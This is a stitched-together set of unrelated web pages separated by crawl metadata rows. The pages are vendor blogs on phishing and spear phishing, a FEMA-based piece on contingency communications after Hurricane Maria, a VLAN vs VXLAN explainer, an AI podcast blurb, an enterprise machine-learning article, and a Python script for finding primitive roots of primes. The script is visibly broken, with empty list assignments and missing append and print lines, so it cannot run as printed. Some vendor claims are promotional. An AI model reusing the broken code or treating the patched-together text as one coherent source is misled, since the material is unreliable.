Spear phishing is a more sophisticated type of phishing. Unlike regular phishing, which usually casts a broader net in hopes of capturing a victim, spear phishing is much more targeted. So, in the context of spear phishing vs phishing, the latter focuses more on quantity. While phishing attacks often interact with thousands of recipients, spear phishing attacks don’t come anywhere near this number.
Instead, spear phishing attacks target you as an individual. Prior to sending you a spear phishing email, attackers engage in social engineering, trying to dig up as much information on you as possible to make it seem like they know you.
With this in mind, spear phishing attacks are most often targeting a very specific goal. Most often, they present themselves as someone from your business or personal life, asking you to send them money and forwarding you seemingly genuine wiring instructions.
Whaling vs Spear Phishing vs Phishing
Besides spear phishing, there’s an even more targeted type of attack, called whaling. This form of phishing only targets CEOs and employees at high levels in the corporate world. Whaling attacks often require the attackers to do extensive research and preparation in order to tailor the phishing email to have the best chance of success.
In short, whaling attacks work identically to regular phishing ones, just with a more specific pretext. For instance, cyber attackers impersonate an employee's boss or colleague and usually ask for a favor or provide them with some sort of opportunity that will entice them to interact with the malicious email.
Example of Phishing Attack
Examples of Phishing Attacks
With phishing being the most common security threat in the online world, there are countless examples of phishing attacks out there. So much so, that even some of the biggest companies in the world aren’t impervious to such threats. With that in mind, we want to share two well-known phishing attacks that have occurred in the past few years.
Just this year, there has been an attack on Microsoft 365 accounts based on AITM (Adversary-in-the-Middle) tactics. The attack was so well-targeted that it even worked on users’ email accounts that had MFA enabled.
Example of Phishing Attack
But, this was far from the only successful big phishing attack in 2022. The renowned US company Cloudflare also experienced a phishing attack when its employees were tricked into entering their work credentials on a phishing site. In less than one minute, at least 76 Cloudflare employees received a phishing text, with many of them falling victim to the ruse.
Example of Phishing Attack
How to Stop a Phishing Attack?
Stopping a phishing attack is challenging, as most people notice what’s happening only when it’s too late. But, there are some prevention methods that you can use to ensure you don’t fall victim to a phishing attack. Here are four best tips on how to prevent a phishing attack:
- Always Verify Before Clicking - this simple tip is very effective for helping you avoid phishing scams. Always think before you click on a link or attachment, and avoid clicking on something you’re not 100% sure about.
- Keep Your Information Private - don’t reveal your private information unless you must. Even when you want to log in or purchase something online, don’t do it through email or SMS links. Go directly to the source site.
- Keep Everything Up to Date - mainstream browsers and antivirus programs regularly put out patches to address new security risks, so make sure not to delay updates when prompted.
- Use a Security Key - security keys that meet FIDO U2F/FIDO2 standards are perhaps the best way to protect yourself from phishing. They automatically recognize the genuine domain and eliminate the need for manually typing passwords.
Protecting Yourself Against Phishing Without Delay
In 2017, Google rolled out a new requirement that completely neutralized phishing attacks on its employees. With well around 140,000 employees, Google hasn’t had any phishing attacks since 2017. This might seem like a logistical miracle, but in reality, it was realized with one simple tweak.
In 2017, all Google employees had to stop using passwords to log in. Even using one-time codes was prohibited. Instead, every Google employee had to start using physical security keys to access their accounts.
A Google spokesperson said Security Keys now form the basis of all account access at Google.“ We have had no reported or confirmed account takeovers since implementing security keys at Google,” the spokesperson said. “Users might be asked to authenticate using their security key for many different apps/reasons. It all depends on the sensitivity of the app and the risk of the user at that point in time.”
Of course, these benefits and security features aren’t only reserved for big tech companies and organizations with massive budgets. Everyone can obtain anti-phishing software free of charge or at a minimal cost and protect themselves from the dangers of phishing attacks.
At Hideez, we have created a cost-effective universal security key that is robust and reliable enough to protect against a variety of attacks. Our Hideez Key 4 can protect you against phishing attacks, MITM attacks, spoofing, and any other type of password-related threat.
Best of all, it doesn’t break the bank, so it’s an approachable solution for small businesses and individual users. For just $49, you will get a complete security solution, combining both hardware and software components. This includes a hardware password manager with an autofill feature, a strong password generator, a security key supporting FIDO/U2F standards, and an RFID key fob.
Knowing the many cybersecurity threats that exist in today’s landscape, you shouldn’t leave your security up to chance. Reach out to us now to request a free trial for enterprises! | <urn:uuid:8396306a-c16e-4757-93cb-8723a6910ba0> | CC-MAIN-2024-38 | https://hideez.com/en-ca/blogs/news/phishing-explained | 2024-09-16T19:12:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651710.86/warc/CC-MAIN-20240916180320-20240916210320-00277.warc.gz | en | 0.949553 | 2,031 | 3.578125 | 4 |
Criminals use phishing, a type of online scam, to impersonate legitimate companies to steal sensitive information. Why is this scam referred to as phishing? The term “phishing” is a spin on the word fishing because criminals dangle a fake “lure”— that looks legitimate and is sent from a reputable company—hoping to get users to “bite” by providing sensitive information like account numbers, passwords, usernames, and credit card numbers. The attacker tricks the recipient into entering information in response to their message or on a website designed to steal or sell his or her data. This is often not an attack to target a specific individual and can therefore be conducted en masse.
Phishing is the most common way in which cybercriminals attack businesses. In fact, phishing rose 61 percent in the past year to more than one million attacks.
The impact of an attack
A successful phishing attack can result in many different consequences and can impact an organization’s finances and reputation including:
- Business disruption: An attack can lead to a company’s customers’ inability to access online services and employees’ unable to work. This often results in a loss of customers and productivity.
- Loss of data: Scammers use phishing to install malicious software on a user’s device. Once infected, they have access to files and gain the ability to track the user’s digital movements.
- Monetary theft: Financial theft occurs when cybercriminals steal an organization’s money, equipment, and/or intellectual property. Another form of monetary theft is using extortion and payment demands in return for the release of sensitive data and information.
- Damaged reputation: Data breaches cause damage to a company’s reputation due to a loss of public trust and the resulting negative impact on its brand.
Types of email phishing attacks
Most phishing attacks are sent by email. 3.4 billion fake emails are sent each day resulting in over a trillion annually. The following are some of the most common types of email phishing attacks:
- Attachments: Most organizations’ email filters scan for known phishing URLs in the body of the email. To get around this, phishing emails that contain a malicious attachment infected with viruses and other malware are common. The attachment is often disguised as an invoice, delivery note, or some other lure designed to get the recipient to open it.
- Links: The more links an email includes, the less likely the user is to check every link. Therefore, cybercriminals hide malicious links in email text and/or signature blocks. Scammers also make the body of an email look like text but in actuality, it’s a clickable image hosted on a fake phishing site.
- Spoofing: When a scammer disguises a phishing attack by tricking the recipient into thinking the message came from a person or entity they know and trust—a colleague, vendor, or business—it’s referred to as spoofing. These emails often include a call to action that’s convincing enough to get the email user to take the action requested.
Related: Types of Phishing
To detect a phishing email, look for the following signs:
- A sense of urgency: An unusually assertive email subject line and/or body text that conveys a sense of urgency can signal fraud. Scammers are trying to instill a false sense of urgency to trick you into acting quickly without carefully reviewing the email. Always be suspicious of emails that claim you must click on a hyperlink or open an attachment immediately.
- Mismatched email domains: If the email claims to be from a reputable person or company but the email is sent from another email domain like Gmail.com, it may be a phishing attempt.
Check that the ‘from’ email address matches the display name and that the ‘reply to’ header matches the source.
- Unanticipated or unusual attachments: If you receive an unexpected or suspicious email attachment that is not relevant to the work you are doing, never open it. When in doubt, call the sender to verify the email and attachment.
- Use of hyperlinks: Always hover over an email hyperlink before clicking it to see the URL and verify its legitimacy. If the link misdirects you or links to an IP address or a foreign domain, it’s more than likely not legitimate and could be malicious.
Related: Indicators of Phishing
Protect your organization’s emails
78 percent of email users understand the risks of hyperlinks in emails but still click them anyway and 97 percent are unable to recognize a sophisticated phishing email. A multi-layered security approach can improve your organization’s resilience against phishing and minimize any disruption that does occur from a successful attack.
Lume’s cybersecurity services feature a layered approach to protection and responsiveness: endpoint protection, DNS protection, and cybersecurity training. Pick and choose a standalone product or bundle it with other services to implement the most holistic cybersecurity solution. Contact us for more information.
Related: Beware of Phishing Scams
This blog was written by Lume Strategies Director of Professional Services Michael Hensley. | <urn:uuid:95299c70-a835-4c9d-9dc7-4ffd14bffd50> | CC-MAIN-2024-38 | https://lumestrategies.com/blog/identifying-and-preventing-email-phishing-attacks/ | 2024-09-16T19:04:33Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651710.86/warc/CC-MAIN-20240916180320-20240916210320-00277.warc.gz | en | 0.934238 | 1,084 | 3.578125 | 4 |
Data is the heart of AI. So, of course we need to have a podcast about data! In this episode of the AI Today podcast hosts Kathleen Walch and Ron Schmelzer define the terms Data, Dataset, Big Data, DIKUW Pyramid.
Data is the basic unit of discrete values that convey meaning, facts, quantities, or other units that computers operate on for further processing, interpretation, and analysis. Big data is what’s helping power this latest wave of AI. Big data is an umbrella term used for data of significant size, complexity, variable format, variable quality, and frequency of change. It presents challenges for storage, processing, analysis, integration, and usage at required levels of detail, speed, and accuracy. In this podcast we review these terms in greater detail.
And we talk about the DIKUW peyramid a lot, especially in CPMAI certification, because it’s a great visual representation of the increasing value that can be derived from a base of Data. The DIKUW pyramid shows increasing value from Data, Information, Knowledge, Understanding, to Wisdom and different aspects that organizations require as they seek greater value. In this episode, we explain how these terms relate to AI and why it’s important to know about them.
- FREE Intro to CPMAI mini course
- CPMAI Training and Certification
- What is the Certified Professional in AI Project Management (CPMAI) Certification?
- AI Glossary
- AI Glossary Series – DevOps, Machine Learning Operations (ML Ops)
- AI Glossary Series – Automated Machine Learning (AutoML)
- AI Glossary Series – Data Preparation, Data Cleaning, Data Splitting, Data Multiplication, Data Transformation
- AI Glossary Series – Data Augmentation, Data Labeling, Bounding box, Sensor fusion | <urn:uuid:551311bb-197b-42d6-9273-36cf9b1ec77f> | CC-MAIN-2024-38 | https://www.cognilytica.com/ai-today-podcast-ai-glossary-series-data-dataset-big-data-dikuw-pyramid/ | 2024-09-16T18:38:03Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651710.86/warc/CC-MAIN-20240916180320-20240916210320-00277.warc.gz | en | 0.853064 | 387 | 2.875 | 3 |
Contingency Communication improves Community Resilience
On September 20, 2017 Hurricane Maria made landfall in Puerto Rico as a Category 4 storm. Hurricane Maria severely damaged or destroyed a significant portion of the regions already fragile infrastructure. Following landfall, 95 percent of cell towers were out of service, and outages continued in the ensuing months, severely testing community resilience.
This article is based on the 2017 Hurricane Season Federal Emergency Management Agency (FEMA) After-Action Report and provides a summary of the lessons learned from Hurricane Maria to help improve community preparedness.
Federal Emergency Management Agency (FEMA)
FEMA’s mission is to lead America to prepare for, prevent, respond to and recover from disasters with a vision of “A Nation Prepared.” FEMA can trace its beginnings back to 1803 to a Congressional Act which is generally considered the first piece of disaster legislation.
As the 2017 hurricanes demonstrated, the impacts of long-term infrastructure outages jeopardize the ability and speed of communities and individuals to recover, and can have dire economic and social consequences.
Communication and Community Resilience
Resiliency is particularly important for lifelines such as communications. Every day, individuals, organizations, and government institutions provide critical services that depend on reliable access to communications systems.
In the immediate aftermath of Hurricane Maria, communication outages caused the following issues:
- Impeded field personnel access to key operating and management systems
- Lack of training on how to prioritize use so as not to overload contingency systems (e.g. satellite)
- Reduced ability of disaster survivors to register for FEMA assistance
- Delayed Resource Requests
- Some FEMA satellite phones could not correctly operate in the Caribbean
- Many staff who received satellite phones did not know how to properly use them
- Demand for satellite phones exceeded supply, which produced procurement and logistical challenges
In the absence of mobile communications, the teams used paper registrations and forms on offline laptops and tablets. These new, non-standard processes caused inaccuracies and omissions, delaying the provision of benefits to survivors.
FEMA staff used handwritten resource requests and subsequently had to review, prioritize, sign, scan, and manually enter more than 2,000 requests into FEMA’s crisis management system, further contributing to delays.
FEMA also experienced shortfalls incorporating the Integrated Public Alert and Warning System into the response, and could have better prioritized the transportation and use of contingency communications equipment, and trained personnel.
Contingency Communication Methods
- Mobile satellite
- Mobile radio
- Logistics support services to provide command and control communications, situational awareness, and program delivery
- Satellite phones (procured and leased satellite devices)
- “Health brigades” of local volunteers knocked on doors to identify and assist those who could not leave
Following is a summary of recommendations for Communication Providers from the 2017 Hurricane Season FEMA After-Action Report:
- Communication providers should work with government to address interdependencies and cascading impacts among critical lifelines and cross-sector coordination
- Arrange combined training exercises with government departments on how to use satellite phones and other emergency communications
- Provide training on how to prioritize use to preserve contingency systems
- Invest in redundant assets to maintain communication
- Invest in more resilient infrastructure
- These investments, including pre-disaster mitigation, will not only reduce disaster costs but also can have life-saving impacts during incidents
- Adopt modern building codes and where necessary upgrade or relocate premises
- Include continuity and resilient all-hazards communications capabilities in plans and guidance
- Ensure staff are regularly trained on how to use the contingency communication resources
Maintaining effective communication following a catastrophic incident is crucial to the recovery of affected communities. Taking the above measures and having a contingency communication plan will provide a boost to community resilience.
Based on the 2017 Hurricane Season FEMA After-Action Report – July 12, 2018
This article has also been published by Comms Risk
If you want to increase your organization’s chances of surviving a major disaster, start planning today with BCP Builder’s Online Business Continuity Plan Template. | <urn:uuid:6fef621a-b82b-4310-938e-c21d43c67d83> | CC-MAIN-2024-38 | https://www.bcpbuilder.com/contingency-communication-following-catastrophic-failure/ | 2024-09-18T02:24:32Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00177.warc.gz | en | 0.929511 | 844 | 2.859375 | 3 |
With the widespread adoption of cloud technology, data centers play a huge role in running key applications and business processes for organizations around the world. In 2022, the IT spending on data centers is expected to be $227 billion, and $237 billion by 2023.
To run these datacenters profitably and deliver quality service to their customers, organizations are constantly trying to squeeze out maximum performance from the hardware. Two technologies, VLANs or Virtual Local Area Networks and VXLANS or Virtual eXtensible Local Area Networks improve network efficiency and contribute to improved security. In this article, we explore what they are, how they work, and the differences in VXLAN vs VLAN.
What is VLAN?
VLAN standards for Virtual LAN or Virtual Local Area Network. VLANs essentially create virtual networks within a local area network and let you group together devices logically. For example, in a LAN in an office or a school, all devices come under one network, with a switch (usually) connecting them. And all of these devices come under one broadcast domain, and maybe even under a single collision domain.
This presents a couple of problems. The packets from different devices may collide, and they’ll have to send again, creating network inefficiencies. This can be avoided by using multiple switches, but it still keeps the devices under the same broadcast domain. The network efficiency decreases further as the number of devices increases.
With a VLAN, you can create multiple networks and broadcast domains of smaller sizes. And you can use these virtual LANs for grouping together devices that frequently communicate with each other. For example, instead of connecting all devices in an office under a single broadcast domain or a single LAN, you can create virtual LANs for the finance department, the HR department, and the marketing department.
How do VLANs work?
They work by creating multiple virtual switches over a single physical switch, with each virtual switch handling the communication for a single VLAN. You can configure individual ports on a physical switch to handle communication only for a single VLAN.
And you can connect these virtual switches to other virtual switches in the same virtual LAN, even if they are on another physical switch.
As you can imagine, this is not scalable; for every VLAN, you’ll need a physical connection between the physical switches. For example, let's say there are three VLANs and two switches involved. To connect the virtual switches on these three VLANS, you’ll need three physical connections. And there are only so many ports on a physical switch.
To solve this, a method was devised to connect multiple switches over a single link called trunk ports. Here, data packets for a single port would be carried over a single port on each physical switch.
As we know, every data packet contains a layer 3 header with destination and source IP address, and a layer 2 header containing the MAC addresses. When data is sent over this trunk port, the information about the VLAN it belongs to is added to the layer 2 header. This tag is called the VID or VLAN ID which identifies the VLAN to which each frame belongs to. This ensures that the data packets in a single VLAN reach only the devices in that virtual LAN.
The VID is a 12-bit field that can create 4096 IDs. But 0 and 4095 are reserved, which means you can have up to 4094 VLANs in a single network.
What is VXLAN?
VXLAN or Virtual eXtensible Local Area Network is a tunneling protocol that carries layer 2 packets over a layer 3 network, that is ethernet over IP.
The need for VXLANs came from the limitations of VLAN, as well as the arrival of server virtualization. Due to its 12 bit identifier, you can only have up to 4094 virtual networks with VLAN. Meanwhile, with VXLAN, a 24-bit identifier — called VXLAN network identifier — is used, with which you can have around 16 million VXLANs.
With server virtualization, each physical server can have multiple virtual servers with its own IP address and operating systems. Different customers or clients may use these virtual servers or virtual machines and to effectively maintain these servers, maintain service continuity, and manage resources efficiently, you need dynamic VM migration. That is, in a data center, you should be able to move virtual machines from one physical server to another without affecting the user.
And for this to happen, the IP address must remain unchanged. So we can only make these changes within the data link layer and due to the constraints with the VID, you can only create a limited number of VLANs.
How VXLAN works
VXLAN creates layer 2 networks that span across layer 3 infrastructure, that is it, ethernet over IP. The ethernet layer works as an overlay network, and IP works as the underlay network. Here, a layer 2 ethernet frame is encapsulated into a VXLAN packet by adding a VXLAN header and a UDP header by a VTEP or a VXLAN Tunnel End Point. The VXLAN header consists of the VXLAN Network Identifier, which identifies the tenant or the virtual server or essentially the specific VXLAN.
The frames from the source server encapsulated by a VTEP are received across the tunnel by another VTEP which decapsulates it and sends it to the destination server. VTEPs can either be a physical device or it could be software deployed on a server.
VLAN vs. VXLAN: What are the differences?
It's time to oppose VLAN vs. VXLAN to take a closer look at their differences. First of all, while VXLANs were developed to overcome the limitations of VLANs, their applications are different, and sometimes VLAN isn’t even mentioned when you’re discussing VXLAN. That said, here are the main differences between VXLAN and VLAN.
VLAN has a 12-bit identifier called VID while VXLAN has a 24-bit identifier called VID network identifier. This means that with VLAN you can create only 4094 networks over ethernet, while with VXLAN, you can create up to 16 million. In terms of the overall infrastructure, you can further isolate networks and improve their efficiency.
In VLAN, a layer 2 network is divided into subnetworks using virtual switches and creating multiple broadcast domains within a single LAN network. In VXLAN, a layer 2 network is overlaid on an IP underlay, and the layer 2 ethernet frame is encapsulated in a UDP packet and sent over a VXLAN tunnel.
VLAN is often used by large businesses to better group devices for improved network performance and security. VLAN does network segmentation just like VXLAN, but its mainly used in data centers for dynamic migration.
Another difference is that VLAN uses the tree spanning protocol, which means half the ports are blocked for use while you can use all the ports in the case of VXLAN, further improving efficiency.
What are the advantages of VLANs?
- Improved security: VLANs let you create more networks with fewer devices. With this, you can segment and group your devices and prevent unauthorized access. Network managers can detect any security issues, set up firewalls, and restrict access to these individual networks. For example, you can keep sensitive data under a private VLAN while opening up a separate VLAN for public use. And even within an organization, segmenting the devices improves security.
- Improved performance: When all the devices are receiving all the messages, it creates congestion over the network. It reduces the bandwidth for communication. With VLAN, you can group together devices that communicate frequently, reduce the broadcast domain, and keep the bandwidth clear. Small broadcast domains are also easy to handle.
- Improved network flexibility: With VLAN, you’re not limited by the physical location of the devices. You can group devices based on their function or the department it belongs to, instead of their physical location. If employees switch to a different location in the company, they can still connect to the same VLAN to work.
- Reduced cost: Switches can usually only reduce the collision domain; you need routers to reduce the broadcast domain, which tends to be expensive. With VLANs, you can segment the network in multiple broadcast domains at a low cost.
- Simplified IT management: For the IT department, small networks with less number of devices are easier to manage and troubleshoot instead of a single large network. They provide more granular control over the networks; depending on the specific use case, you can configure the security for these individual networks.
What are the advantages of VXLANs?
- Improved scalability: Compared to VLAN, VXLAN is highly scalable, allowing 16 million isolated networks. This makes it easy to scale and highly useful in data centers, letting them accommodate more tenants.
- Supports dynamic VN migration: This is very important for continuity of services and efficient utilization of resources in a data center. This lets managers upgrade or maintain servers by shifting the VMs to another server without interrupting the services or the user knowing about it. If businesses want to add redundant servers at a different geographical location, they can manage the VMs using VXLANs. It keeps the data center robust and reliable.
- VXLAN can be easily configured and managed: VXLAN is a software-defined network (even though vendors have developed ASICs for VXLANs), and works as an overlay over an underlying IP network. This means the network can be managed and monitored with a centralized controller.
Being an overlay network brings a lot of additional advantages for VXLAN.
VXLAN: overlay over an underlying IP network
As we discussed earlier, VXLAN is a layer 2 virtual network over a layer 3 IP network. This is possible due to the encapsulation and decapsulation process; at the edges, the layer-2 frames are encapsulated into layer 3 packets which are then routed through the IP network.
This means that the overlay and the physical IP network are decoupled and you can make changes to either network without making any changes to the other. This doesn’t mean there won’t be any impact, if the underlying network can’t handle the traffic, it will affect the performance of the overlay network.
Another benefit is that the possibility of duplicate causing a problem is greatly reduced. With multiple VMs is that if two VMs have the same MAC address, it can create networking problems as the switches won’t know where to send the data packets. But a VXLAN can have duplicate MAC addresses without a problem as long as they’re in a different VXLAN segment.
The decoupled physical and virtual layers also mean tenants are not limited by the IP addresses or broadcast domains of the underlying IP network when planning their virtual networks.
In the MAC Address Table, a switch has to store the MAC Addresses of all the devices it is connected to and keep them updated. This means the more devices they’re connected to the more memory it needs and the higher the cost. With this overlay network, not all devices have to identify the MAC addresses of the VMs and the switch has to learn less number of MAC addresses.
How to deploy VXLAN? Three different methods
The different methods of deploying are more or less where the VTEP is located, whether it's in software or hardware.
1. Host-based VXLAN
As the name suggests, here the VXLAN runs on the host. In this case, a virtual switch acts as a VTEP encapsulating and decapsulating the data packets — and is also referred to as a software VTEP.
The virtual switch encapsulates the data before it goes to the physical network, and is only decapsulated at the destination VTEP. These VTEPs can even be inside hypervisor hosts. And because of this, there’s only IP traffic in the physical network.
2. Gateway-based VXLAN
In a gateway-based VXLAN or a hardware VXLAN, the VTEP is within a switch or a router. These devices will then be referred to as VXLAN gateways.
Here, the switches encapsulate and decapsulate the data packets and create tunnels with other VTEPs. The traffic from the hosts to the gateways will be layer 2, while the rest of the network will see only IP traffic.
3. Hybrid VXLAN
In a hybrid implementation, some of the VTEPs are on hardware while some are on hosts in virtual switches. Here, the traffic flows from the source VTEP to the destination VTEP and either of them may be hardware or software.
Frequently asked questions
What exactly is a VLAN?
VLAN or Virtual Local Area Network creates multiple smaller broadcast domains over a single Ethernet network. They are used to logically group together devices and improve network efficiency and security.
What exactly is VXLAN?
VXLAN or Virtually eXtensible Local Area Networks overlay a layer 2 network on an underlying layer 3 IP network. They’re used for large-scale segmentation and isolation and handle multiple VMs in data centers. | <urn:uuid:160e417b-7723-46af-96a1-463ff1439a1b> | CC-MAIN-2024-38 | https://blog.invgate.com/vxlan-vs-vlan | 2024-09-10T17:05:20Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651303.70/warc/CC-MAIN-20240910161250-20240910191250-00877.warc.gz | en | 0.920884 | 2,769 | 3.09375 | 3 |
Automation is the key to success; every company is expanding on this domain’s expertise, as organizations take on a more global approach. Given the problems of decision making, learning, and the need for adaptability when understanding data, data scientists introduced the concept of Machine Learning within the realm of Artificial Intelligence. These practices have been able to bring about a radical change in modern business efficiency.
Artificial Intelligence is commonly a platform which performs tasks intelligently, without incurring the need for human intervention. On the other hand, Machine Learning is an exclusive part of the Artificial Intelligence world, which encapsulates the know-how and the logic behind making the concept of Artificial Intelligence a real success story. Through the use of Machine Learning, machines can be taught to work more sensibly, thereby allowing them to recognize different patterns and understand new circumstances with ease.
Machine Learning has come to be used extensively, especially when it comes to providing analytical solutions to the world of consumers and technology. Through large systems of data, Machine Learning has been able to drive solutions, which help create a more data-driven approach towards solving problems.
How Artificial Intelligence is Changing Enterprise Applications
Corporate enterprises are showing a growing interest in the field of Artificial Intelligence and Machine Learning. From IBM’s Watson to Google’s DeepMind to AWS’s multiple Artificial Intelligence services, there is a lot of activity happening in the market these days.
Other features of Machine Learning include the likes of Deep Learning, computer vision and natural language processing (NLP). With all these innovations languages in place, computers can enhance their functionalities, including pattern recognition, forecasts, and analytical decision-making.
By incorporating Artificial Intelligence and Machine Learning techniques in day to day functions, large enterprises can automate everyday tasks and enhance their overall efficiency in the long run.
Here are some ways in which Machine Learning techniques are helping enterprises enhance their efficiency:
Improving Fraud Detection: Fraud detection has become the need of the hour, as more and more companies are investing heavily in these new capabilities. With more companies falling prey to fraudulent practices, there is an imminent need to be ahead in the game of fraud detection. With Artificial Intelligence and Machine Learning in place, companies and organizations can extensively direct their resources towards enriching their fraud prevention activities, to help isolate potential fraud activities.
Loss Prediction and Profit Maximization: When it comes to deriving insights from heaps of data, there is nothing better than Machine Learning to prevent loss prediction and maximize profits. The stronger the techniques, the more foolproof the loss prediction methodologies would become in the long run.
Personalized Banking: In this era of digitization, everything is automated. For this reason, banks often seek to deliver customized, top notch, personalized experiences to their customers to keep loyalty intact. By leveraging their data, banks can aim to unearth customer needs and fulfill them with the utmost precision and dedication.
Robotic Financial Advisors: Portfolio management has become the talk of the town these days, especially since robotic financial advisors have stepped into the game. Clients can benefit immensely by this advancement, since the right opportunities are mapped with their portfolio needs and demands. Robotic applications are easy to merge with services such as Alexa and Cortana, allowing banks to provide exceptional service to their customers. Through this integration, financial institutions can hope to acquire new customers and also offer more individualized services to existing customers.
Next-Era Digital Traveling: Through the use of recommendation engines, travelers can experience the new recommendations for their travel aspirations. Organizations can play a role by allowing customers to converse with chatbots, which are created through the use of Artificial Intelligence and Machine Learning. As predicted by Gartner, by the year 2020, 25% of all customer service operations will rely on virtual assistant technology to make their business ends meet.
Detailed Maintenance: Through the help of predictive maintenance, industries like aviation, transportation, and manufacturing are expecting to be able to provide the best customer service in the market. Through the use of predictive models, such industries can accurately forecast prices and predict their losses, thereby, reducing any redundancies in the future.
With digitization paving the path of the future, there is a bright scope for companies and organizations which are investing heavily in these new age technologies of Machine Learning and Artificial Intelligence. Third party consulting services such as Idexcel are ready to help companies looking to take their first step with industry leading consulting and cloud-advisory services.
As we progress through the years, what should be interesting to note are the changes we will get to see in the various industries, as every sector aims to provide exceptional customer service to their customers in multiple ways.
How Your Small Business can Benefit from Machine Learning
Machine Learning’s Impact on Cloud Computing
Amazon SageMaker in Machine Learning
The Future of Data Science Lays within Cloud-Based Machine Learning and Artificial Intelligence | <urn:uuid:74ca1cfb-c5d5-4853-8406-647907422ee2> | CC-MAIN-2024-38 | https://www.idexcel.com/blog/tag/artificial-intelligence-cloud-computing/ | 2024-09-11T22:18:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651405.61/warc/CC-MAIN-20240911215612-20240912005612-00777.warc.gz | en | 0.943158 | 997 | 2.796875 | 3 |
Mostly because of their importance in some types of asymmetric cryptography (Diffie-Hellman, RSA) I have a fascination with prime numbers. I enjoy occasionally checking on the latest discovery of ever larger prime numbers. As I write the largest known prime has more than 17, 425, 170 digits in it. That’s a big-ass number! Many years ago I wanted to get a blanket made that had the largest prime printed on it. Geek stuff, I know.
One of the important components of a Diffie-Hellman key exchange is the use of a primitive root for a given prime number. I know what a primitive root is but if I try to explain it here I’ll just make mathematicians angry. I’ll direct you instead to Wikipedia’s discussion of primitive roots and ask that you read, at the very least, the first sentence of the article. If you want to watch some really awesome videos on modern cryptography that will briefly discuss what a primitive root is (and why it’s important) check out this video discussing the discrete logarithm problem on the Khan Academy website. You should watch the whole series on the Khan Academy website; it is excellent (do a Google search for “Journey Into Cryptography“).
In class I use a python script to illustrate the Diffie-Hellman key exchange but I always used really small primes (like 17 or 47). They work just fine but I wanted to be able to use larger numbers to further illustrate the concepts and math at work. To do that I needed to be able to figure out the primitive roots of larger prime numbers. Googling for primitive roots of primes didn’t give me a lot so I wanted to see if I could get python to help me out. The code below works (to the very best of my knowledge). I have used it for many different primes and the primitive roots generated always work in my Diffie-Hellman math examples (which I will post in an upcoming Edition)
Here’s the Code:
# This script will generate all of the primitive roots
# for a given prime number.
prime = int(raw_input("Enter a prime number: "))
num_to_check = 0
p_minus_1_range = range(1,prime)
print "If you entered a large number (4+ digits) this could take a long time."
primitive_roots =
for each in range(1, prime):
num_to_check += 1
candidate_prim_roots =
for i in range(1, prime):
modulus = (num_to_check ** i) % prime
cleanedup_candidate_prim_roots = set(candidate_prim_roots)
if len(cleanedup_candidate_prim_roots) == len(range(1,prime)):
print "Primitive roots of %d are:" % prime
Note: Depending on the size of the prime you enter it could take a while to sort things out. Even though the script is pretty short there is a whole bunch of number crunching going on. In my tests on my late 2013 Macbook Pro (Intel 2.6GHz Core i7 with 16GB RAM) it took a little over 4 minutes to calculate all of the primitive roots of the prime 1907. All of the primitive roots for the prime 941 were generated in 28 seconds. Generating all of the primitive roots for the prime 5051 took an impressive 113 minutes. It’s also worth noting that the script uses a pretty big chunk of RAM (about 6GB in my generation of the primitive roots of 5051). So if you want to generate primitive roots of big primes, either be patient or get a better computer than the one I am using.
Linus and OSX users: If you want to know how long the script takes to complete, try running it with the time command (i.e. time ./primitive_root_finder.py)
If you liked this post, please consider sharing it. Thanks! | <urn:uuid:007d0ae2-0983-4d9c-b52c-300b8acd4975> | CC-MAIN-2024-38 | https://www.itdojo.com/wrapped-in-python-edition-4/ | 2024-09-20T16:07:41Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725701419169.94/warc/CC-MAIN-20240920154713-20240920184713-00077.warc.gz | en | 0.887507 | 860 | 2.875 | 3 |
Phishing is a broad category that can encompass many flavors of the same basic cyberattack. An estimated 90% of incidents that end in a data breach start with a phishing email. Phishing can also lead down dark roads to a host of nasty cyberattacks like business email compromise, ransomware and account takeover. However, some of the specialized versions of phishing that you may encounter do have hallmarks that can clue you in to the scam. Go behind the scenes into three nasty varieties of phishing to learn the key indicators and red flags to look for to avoid becoming the victim of one of these potentially devastating phishing attacks.
Explore today’s biggest threats & what’s next in The State of Email Security 2022 GET IT>>
Angler Phishing (Social Media Phishing)
A phishing attack conducted through the use of social media lures, like messages telling the target that they have been tagged in a photo, direct messages on messaging apps or emails from social media site administrators.
Enticing the target to interact with a fake or spoofed login page for the requisite social media site that they can then use to capture the victim’s password. The cybercriminals can then perform an ATO and use the victim’s account for fraud like BEC or snoop for information on the victim’s connections to help them better target sophisticated spear phishing attacks.
Angler phishing is a relatively new form of phishing that has risen to prominence over the past decade. The preferred format for a malicious message using this technique is email, but it can also be conducted through messaging. LinkedIn messages are the most effective for cybercriminals, with a 47% open rate. However, cybercriminals will imitate messages from any social network to lure in unsuspecting victims.
Some examples include:
- Recruiters are looking at your profile!
- You appeared in new searches this week!
- Please add me to your LinkedIn network
- A new photo of you has been tagged on Facebook
- Someone sent you a direct message on Twitter
- See who is looking at your profile!
- You’ve been tagged in a photo on Instagram
- Confirm my WhatsApp account
- Your TikTok Verified Badge
Employees that take the bait in social media phishing attacks can fall victim to dangerous ensuing attacks including credential compromise and business email compromise. In January 2021, organizations experienced about 34 social-media-related phishing attacks per month. However, in June this number rose closer to 50, representing a 47 percent increase through the first half of 2021. By September 2021, organizations were looking at more like 61 social-media-related phishing attacks per month – a shocking 82% increase in just three quarters.
AI is the secret weapon you’re looking for to boost business email security. SEE WHY>>
A phishing attack featuring personalized details in the lure that add believability to increase the likelihood that the recipient will take the bait. Spear phishing is the most common type of specialized phishing attack, and can be aimed at anyone at any level within an organization. These messages can also be very tricky to spot – 97% of employees are unable to detect a sophisticated phishing message lie the type used in spear phishing attacks.
To lure unwary recipients into taking an action that achieves the desired end for the bad guy like handing over credentials, sending money, allowing them access to sensitive systems and data, infecting systems with ransomware or malware or other nefarious purposes.
Cybercriminals use personalized information about their targets to craft emails that seem legitimate, often powered by information obtained from social media profiles, dark web markets and corporate websites. These lures can include:
- Emails from the recipient’s alma mater asking for updated address information.
- A message advising the victim to reset their password at a social media site.
- Free downloads from organizations to which the recipient belongs.
